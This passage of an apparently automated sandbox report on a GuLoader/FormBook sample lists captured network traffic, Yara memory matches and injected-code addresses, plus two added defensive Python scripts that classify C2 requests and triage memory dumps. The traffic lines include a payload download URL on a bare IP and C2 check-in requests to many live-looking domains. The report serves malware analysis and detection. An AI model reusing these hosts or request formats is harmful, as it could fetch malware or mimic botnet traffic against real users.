/></head><body><div align=center><h3>Error. Page cannot be displayed. Please contact your service provider for more details. (35)</h3> <!--- 102.129.145.32---></div></body></html>
      Source: unknown | TCP traffic detected without corresponding DNS query: 103.72.68.128 (50 identical entries; this is the host contacted directly by IP address for the GET /pcd/zkltfDHOiVw63.bin download listed below, so no DNS resolution precedes the connection)
      Source: jU0hAXFL0k.exe, 0000000C.00000001.2063871128101.0000000000649000.00000020.00000001.01000000.00000007.sdmp | String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
      Source: jU0hAXFL0k.exe, jU0hAXFL0k.exe, 00000005.00000000.2063367292434.0000000000409000.00000008.00000001.01000000.00000003.sdmp, jU0hAXFL0k.exe, 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: jU0hAXFL0k.exe, 00000005.00000000.2063367292434.0000000000409000.00000008.00000001.01000000.00000003.sdmp, jU0hAXFL0k.exe, 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: jU0hAXFL0k.exe, 0000000C.00000001.2063871128101.0000000000649000.00000020.00000001.01000000.00000007.sdmp | String found in binary or memory: http://www.gopher.ftp://ftp.
      Source: jU0hAXFL0k.exe, 0000000C.00000001.2063871128101.0000000000649000.00000020.00000001.01000000.00000007.sdmp | String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: unknown | DNS traffic detected: queries for: assets.msn.com
      Source: global traffic | HTTP traffic detected: GET /pcd/zkltfDHOiVw63.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 103.72.68.128 | Cache-Control: no-cache
      Source: global traffic | HTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=aZ/lcGP+1FkvlwdkDULp+PnMy+vqJpYUHhxtLH0JyJK/Dwy50YtC4wzl69ZsBTKZeIRM HTTP/1.1 | Host: www.juara102-azura.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty; the body is seven NUL bytes)
      Source: global traffic | HTTP traffic detected: GET /rs10/?wr5xXxu=0iJ8M3XqpMfSbPzaPESpQVivP40tWom07G4vKfCAiNjWSIJ0IxOBhHolE1vkpwp+8Hu6&CZF=FZ4P3Z3Pkfe HTTP/1.1 | Host: www.fftsxxx.top | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty; the body is seven NUL bytes)
      Source: global traffic | HTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=SxqHGPQaAl7yFZn58Kwa4D8rXi7vUXAn+pZ+h1ux2Xs7o9rzQOK5UHTSqMwI3eALG/2g HTTP/1.1 | Host: www.nightoracle.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty; the body is seven NUL bytes)
      Source: global traffic | HTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=Jl6D3AYJMpsoqEFrbY4lXgI+CqA8jAhhEBHBOp3JwZxwH/kCFGDnFMsoz66PDEG/ZKuf HTTP/1.1 | Host: www.thesoftwarepractitioner.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty; the body is seven NUL bytes)
      Source: global traffic | HTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=uoL10Qcd0eLYS7Ve2hB0LYPAWS6gq5lEHn4a3bybbvdgEh6IH9sFuMB9DUK4ZLPCWxvn HTTP/1.1 | Host: www.laserhairremovalkit.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty; the body is seven NUL bytes)
      Source: global traffic | HTTP traffic detected: GET /rs10/?wr5xXxu=uVlfmkRF+iVw/eVgHGJAPYTHwOK+gja5lCenY26JIHiuhJtAWLwToWVuFNjfQJtXy5r3&CZF=FZ4P3Z3Pkfe HTTP/1.1 | Host: www.omarshafie.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty; the body is seven NUL bytes)
      Source: global traffic | HTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=KT0d1e3BBcKFYE425gVaQdIZfgENHgjmY2M2c9Bsa4V4Og8kkivQcwUvXP4wlMvPRBCl HTTP/1.1 | Host: www.electric-cars-19095.bond | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty; the body is seven NUL bytes)
      Source: global traffic | HTTP traffic detected: GET /rs10/?wr5xXxu=tDFPqbQSWha/CSL3nrPGL7FBUiRZeUezwZrLB2afcgfzzGJsCl08dK+Vf/r9oM/AKN8c&CZF=FZ4P3Z3Pkfe HTTP/1.1 | Host: www.latitudeinformatics.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty; the body is seven NUL bytes)
      Source: global traffic | HTTP traffic detected: GET /rs10/?wr5xXxu=OJwcZLoBL0+y/b1nUKgyY9euQNPYkahm34mOnyUSFfzLd1inlK2E8ylg3tCjMnF+BDY5&CZF=FZ4P3Z3Pkfe HTTP/1.1 | Host: www.hdlive7.live | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty; the body is seven NUL bytes)
      Source: global traffic | HTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=h9cyBphf9TZy/NiZOY7V20wqq+uuKxDlnXh3oTW0sJJqbjikvIbKCSguXowJmn7XnCFt HTTP/1.1 | Host: www.robertjamesfineclothing.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty; the body is seven NUL bytes)
      Source: global traffic | HTTP traffic detected: GET /rs10/?wr5xXxu=tnlFoTupmPEe2FuJuv6YyFNcBynACc4EqLKIKpHaKJfweHMHroc5yQmaieiVC2idvHp8&CZF=FZ4P3Z3Pkfe HTTP/1.1 | Host: www.practicaloutsource.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty; the body is seven NUL bytes)
      Source: global traffic | HTTP traffic detected: GET /rs10/?wr5xXxu=pPtLjK/UsFcChRXxT0x+WEjNRlgjs/QTeyWPHt+QyMOk/3bi5sdkKHli51cvqOL5Mhkn&L0Dp=Ifmdxb8 HTTP/1.1 | Host: www.mtauratarnt.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty; the body is seven NUL bytes)
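The requests above show two distinct shapes that a network analyst can pivot on: one download of an opaque .bin object from a host addressed by bare IP (no DNS query precedes it), and a series of GET requests to /rs10/ on rotating www.* domains, each carrying exactly two query parameters (one short token that repeats across hosts, one 68-character base64-like blob) and, unusually for a GET, a body of seven NUL bytes. The classifier below is an added example written for this report, not Joe Sandbox code and not part of either malware family; the family names in its verdicts are taken from the report's own attributions (GuLoader, FormBook), while the thresholds and heuristics are the example's own assumptions. The sample input is constructed from the request lines listed above with the headers re-separated.

```python
import ipaddress
import re
from dataclasses import dataclass

# Constructed sample input: request lines from the "HTTP traffic detected" entries
# above, with headers re-separated by CRLF and the seven-NUL body restored. The
# last request is a benign control that must not be flagged.
SAMPLE_REQUESTS = [
    "GET /pcd/zkltfDHOiVw63.bin HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0\r\n"
    "Host: 103.72.68.128\r\nCache-Control: no-cache\r\n\r\n",
    "GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=aZ/lcGP+1FkvlwdkDULp+PnMy+vqJpYUHhxtLH0JyJK/Dwy50YtC4wzl69ZsBTKZeIRM HTTP/1.1\r\n"
    "Host: www.juara102-azura.com\r\nConnection: close\r\n\r\n" + "\x00" * 7,
    "GET /rs10/?wr5xXxu=0iJ8M3XqpMfSbPzaPESpQVivP40tWom07G4vKfCAiNjWSIJ0IxOBhHolE1vkpwp+8Hu6&CZF=FZ4P3Z3Pkfe HTTP/1.1\r\n"
    "Host: www.fftsxxx.top\r\nConnection: close\r\n\r\n" + "\x00" * 7,
    "GET /rs10/?wr5xXxu=pPtLjK/UsFcChRXxT0x+WEjNRlgjs/QTeyWPHt+QyMOk/3bi5sdkKHli51cvqOL5Mhkn&L0Dp=Ifmdxb8 HTTP/1.1\r\n"
    "Host: www.mtauratarnt.com\r\nConnection: close\r\n\r\n" + "\x00" * 7,
    "GET /index.html?lang=en HTTP/1.1\r\nHost: www.example.com\r\nConnection: close\r\n\r\n",
]

# Assumed threshold: a query value of 40+ base64-alphabet characters counts as an encoded blob.
BASE64ISH = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


@dataclass
class HttpRequest:
    method: str
    path: str
    query: list      # (key, value) pairs; '+' and '/' are kept verbatim on purpose
    headers: dict    # header names lower-cased
    body: bytes


def parse_request(raw: str) -> HttpRequest:
    """Minimal HTTP/1.1 request parser; does not URL-decode (the blob must stay intact)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, qs = target.partition("?")
    query = [tuple(p.split("=", 1)) if "=" in p else (p, "") for p in qs.split("&") if p]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, query, headers, body.encode("latin-1"))


def is_ip_literal(host: str) -> bool:
    """True when the Host header is an IPv4 address (optional :port), i.e. no DNS was needed."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def classify(req: HttpRequest) -> dict:
    host = req.headers.get("host", "")
    hits, token = [], None
    # Shape 1: opaque .bin fetched from a bare-IP host (the payload download above).
    if is_ip_literal(host) and req.path.lower().endswith(".bin"):
        hits.append("ip-literal-host+bin-download")
    # Shape 2a: a GET that nevertheless carries a body consisting only of NUL bytes.
    if req.method == "GET" and req.body and set(req.body) == {0}:
        hits.append("get-with-nul-body")
    # Shape 2b: exactly two query parameters, one short token plus one long base64-like blob.
    if len(req.query) == 2:
        shorts = [f"{k}={v}" for k, v in req.query if len(k) <= 8 and len(v) <= 16]
        longs = [v for _, v in req.query if BASE64ISH.match(v)]
        if shorts and longs:
            hits.append("short-token+base64ish-blob")
            token = shorts[0]   # repeats across hosts, so it is a usable pivot
    if "ip-literal-host+bin-download" in hits:
        verdict = "guloader-payload-fetch"
    elif {"get-with-nul-body", "short-token+base64ish-blob"} <= set(hits):
        verdict = "formbook-c2-checkin"
    else:
        verdict = "unclassified"
    return {"verdict": verdict, "host": host, "path": req.path, "token": token, "hits": hits}


def extract_iocs(raw_requests) -> dict:
    """Run the classifier over raw requests and collect hosts, payload URLs and shared tokens."""
    results = [classify(parse_request(r)) for r in raw_requests]
    c2 = [r for r in results if r["verdict"] == "formbook-c2-checkin"]
    fetch = [r for r in results if r["verdict"] == "guloader-payload-fetch"]
    return {
        "payload_urls": sorted(f"http://{r['host']}{r['path']}" for r in fetch),
        "c2_hosts": sorted(r["host"] for r in c2),
        "tokens": sorted({r["token"] for r in c2}),
        "results": results,
    }


if __name__ == "__main__":
    for key, value in extract_iocs(SAMPLE_REQUESTS).items():
        if key != "results":
            print(f"{key}: {value}")
```

Only the GET with the NUL body and the two-parameter query together produce the check-in verdict; either alone is too weak on its own, since a single-parameter query or an empty body is common in benign traffic, which is why the control request stays unclassified.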
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Code function 5_2_0040523F: GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard

      E-Banking Fraud

      Source: Yara match | File source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      System Summary

      Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: jU0hAXFL0k.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
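The memory-dump identifiers in the Yara matches above carry the information that makes these hits meaningful: three of the four land in PAGE_EXECUTE_READWRITE memory of type MEM_MAPPED (executable memory that is not backed by a loaded image, which is where hollowed or injected code lives), in process 0xF (cmd.exe, per the "Code function" entries for process 15 below) and in process 0xC (jU0hAXFL0k.exe). The fourth is a PAGE_READWRITE private region, which Yara can still match on decrypted strings or configuration. The script below is an added triage example written for this report, not Joe Sandbox code. Its field layout for the dump names (PID.snapshot.id.base.protect.unknown.type.unknown, all hex) is an assumption inferred from the names on this page; the PAGE_* and MEM_* constants are the standard Windows ones; the PID-to-process mapping is taken from other entries on this page. The sample input is constructed from the dump names above.

```python
from dataclasses import dataclass

# Constructed sample input: the dump identifiers from the Yara match entries above,
# plus two image-backed dumps from the "String found in binary or memory" entries.
SAMPLE_DUMPS = [
    "0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp",
    "0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp",
    "0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp",
    "0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp",
    "00000005.00000000.2063367292434.0000000000409000.00000008.00000001.01000000.00000003.sdmp",
    "0000000C.00000001.2063871128101.0000000000649000.00000020.00000001.01000000.00000007.sdmp",
]

# Standard Win32 memory constants (winnt.h).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# PID -> image name, taken from other entries in this report (PIDs in dump names are hex).
PROCESS_NAMES = {0x5: "jU0hAXFL0k.exe", 0xC: "jU0hAXFL0k.exe", 0xF: "cmd.exe"}


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    snapshot: int
    base: int
    protect: int
    mem_type: int

    @property
    def process(self) -> str:
        return PROCESS_NAMES.get(self.pid, "?")

    @property
    def protect_name(self) -> str:
        # Low byte holds the access class; higher bits (PAGE_GUARD etc.) are modifiers.
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:08x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:08x}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & 0xF0)   # any of the PAGE_EXECUTE* classes


def parse_dump_name(name: str) -> DumpRegion:
    """Assumed layout (inferred from the names on this page, not documented here):
    PID.snapshot.id.base.protect.<unknown>.type.<unknown>.sdmp, every field hex."""
    stem = name[:-5] if name.endswith(".sdmp") else name
    fields = stem.split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected dump name layout: {name}")
    v = [int(f, 16) for f in fields]
    return DumpRegion(pid=v[0], snapshot=v[1], base=v[3], protect=v[4], mem_type=v[6])


def is_injection_candidate(r: DumpRegion) -> bool:
    """Executable memory that is not backed by an image section."""
    return r.executable and r.type_name != "MEM_IMAGE"


def nearest_dump_below(pid: int, addr: int, regions):
    """For a code address in `pid` (e.g. 0x02DEE81A from a '15_2_02DEE81A' entry), return the
    same-PID dump with the highest base at or below it and the offset from that base, or None.
    Whether the address truly lies inside the region needs the region size, which this
    section of the report does not print."""
    cands = [r for r in regions if r.pid == pid and r.base <= addr]
    if not cands:
        return None
    best = max(cands, key=lambda r: r.base)
    return best, addr - best.base


def triage(names):
    """One summary line per dump, flagging executable non-image memory."""
    lines = []
    for r in (parse_dump_name(n) for n in names):
        flag = "INJECTED-CODE CANDIDATE" if is_injection_candidate(r) else "image/non-exec"
        lines.append(f"pid {r.pid:>2} ({r.process:<14}) base 0x{r.base:08x} "
                     f"{r.protect_name:<23} {r.type_name:<11} {flag}")
    return lines


if __name__ == "__main__":
    print("\n".join(triage(SAMPLE_DUMPS)))
    hit = nearest_dump_below(15, 0x02DEE81A, [parse_dump_name(n) for n in SAMPLE_DUMPS])
    print(f"15_2_02DEE81A sits 0x{hit[1]:x} above the PID 15 dump based at 0x{hit[0].base:08x}")
```

Running it marks the three RWX MEM_MAPPED dumps as candidates and leaves the PAGE_READWRITE private region and the two image-backed dumps unflagged. The offset lookup ties the "Code function" addresses in the 0x02DDxxxx-0x02DExxxx range for process 15 to the RWX region based at 0x02DD0000 that the Yara rules matched, which is the picture the report's process-hollowing and thread-injection signatures describe.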
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Code function 5_2_00403235: EntryPoint,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Code function: 5_2_00406666
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Code function: 5_2_6FE91A98
      Source: C:\Windows\SysWOW64\cmd.exe | Code functions (106 entries, all of the form 15_2_<address>, i.e. process 15, stage 2), grouped by address range:
        00D6xxxx-00D8xxxx (19): 00D674B1, 00D74875, 00D64C10, 00D6540A, 00D84191, 00D8695A, 00D69144, 00D74EC1, 00D8769E, 00D75A86, 00D73EB3, 00D66E57, 00D6D660, 00D83E66, 00D6EE03, 00D67A34, 00D70BF0, 00D70740, 00D66B20
        03ADxxxx-03BBxxxx (82): 03AE1380, 03BAF330, 03AFE310, 03ADD2EC, 03BA124C, 03B0B1E0, 03AF51C0, 03B8D130, 03BB010E, 03ADF113, 03B3717A, 03AE00A0, 03B2508C, 03BA70F1, 03AFB0D0, 03B9E076, 03AF2760, 03AFA760, 03BA6757, 03AF0680, 03BAF6F6, 03AEC6E0, 03B636EC, 03BAA6C0, 03B8D62C, 03B0C600, 03B14670, 03B9D646, 03BAF5C9, 03BA75C6, 03BBA526, 03AF0445, 03B64BC0, 03BAFB2E, 03AF0B10, 03B0FAA0, 03BAFA89, 03BACA13, 03BAEA5B, 03AEE9A0, 03BAE9A6, 03B359C0, 03B698B2, 03B06882, 03BA78F3, 03BA18DA, 03AF28C0, 03B90835, 03B1E810, 03AF3800, 03B0B870, 03AD6868, 03BAF872, 03AF9870, 03BAEFBF, 03AF6FE0, 03BA1FC6, 03AFCF00, 03BAFF63, 03BA0EAD, 03AF1EB2, 03AE2EE8, 03BA9ED2, 03B90E6D, 03B10E50, 03B02DB0, 03B8FDF4, 03AF9DD0, 03BAFD27, 03AEAD00, 03AF0D69, 03BA7D4C, 03B89C98, 03B0FCE0, 03BBACEB, 03B08CDF, 03AFAC20, 03AE0C12, 03AF3C60, 03BA6C69, 03BAEC60, 03B9EC4C
        02DDxxxx-02DExxxx (5): 02DEE81A, 02DEE10A, 02DD9E60, 02DD2FB0, 02DEE4D9
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function: 03B5E692 appears 84 times
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function: 03ADB910 appears 266 times
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function: 03B37BE4 appears 88 times
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function: 03B6EF10 appears 105 times
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function: 03B25050 appears 36 times
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_00D69458 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_00D764CA NtQueryInformationToken
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_00D87460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_00D7643A NtOpenThreadToken,NtOpenProcessToken,NtClose
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_00D74823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
